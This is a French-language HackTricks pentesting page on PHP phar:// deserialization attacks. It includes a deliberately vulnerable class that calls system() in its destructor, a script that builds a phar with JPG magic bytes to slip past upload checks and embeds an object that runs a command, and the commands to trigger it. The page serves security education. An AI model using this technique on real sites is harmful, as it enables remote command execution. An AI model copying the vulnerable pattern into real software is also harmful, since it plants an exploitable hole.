hacktricks/pentesting-web/file-inclusion/phar-deserialization.md

5.5 KiB

Désérialisation phar://

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert AWS Red Team de HackTricks)!

Autres façons de soutenir HackTricks :

Astuce de prime de bug : inscrivez-vous à Intigriti, une plateforme de prime de bug premium créée par des pirates informatiques, pour des pirates informatiques ! Rejoignez-nous sur https://go.intigriti.com/hacktricks aujourd'hui, et commencez à gagner des primes allant jusqu'à 100 000 $ !

{% embed url="https://go.intigriti.com/hacktricks" %}

Les fichiers Phar (PHP Archive) contiennent des métadonnées au format sérialisé, donc, lorsqu'elles sont analysées, ces métadonnées sont désérialisées et vous pouvez essayer d'exploiter une vulnérabilité de désérialisation dans le code PHP.

La meilleure chose à propos de cette caractéristique est que cette désérialisation se produira même en utilisant des fonctions PHP qui n'évaluent pas le code PHP comme file_get_contents(), fopen(), file() ou file_exists(), md5_file(), filemtime() ou filesize().

Imaginez donc une situation où vous pouvez faire en sorte qu'un site web PHP obtienne la taille d'un fichier arbitraire en utilisant le protocole phar://, et à l'intérieur du code, vous trouvez une classe similaire à celle-ci :

{% code title="vunl.php" %}

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path

{% endcode %}

Vous pouvez créer un fichier phar qui, lorsqu'il est chargé, exploitera cette classe pour exécuter des commandes arbitraires avec quelque chose comme :

{% code title="create_phar.php" %}

<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

{% endcode %}

Notez comment les octets magiques de JPG (\xff\xd8\xff) sont ajoutés au début du fichier phar pour contourner les éventuelles restrictions de téléchargement de fichiers.
Compilez le fichier test.phar avec :

php --define phar.readonly=0 create_phar.php

Et exécutez la commande whoami en abusant du code vulnérable avec :

php vuln.php

Références

{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}

Conseil bug bounty: inscrivez-vous sur Intigriti, une plateforme premium de bug bounty créée par des hackers, pour des hackers! Rejoignez-nous sur https://go.intigriti.com/hacktricks aujourd'hui, et commencez à gagner des primes allant jusqu'à 100 000 $!

{% embed url="https://go.intigriti.com/hacktricks" %}

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks: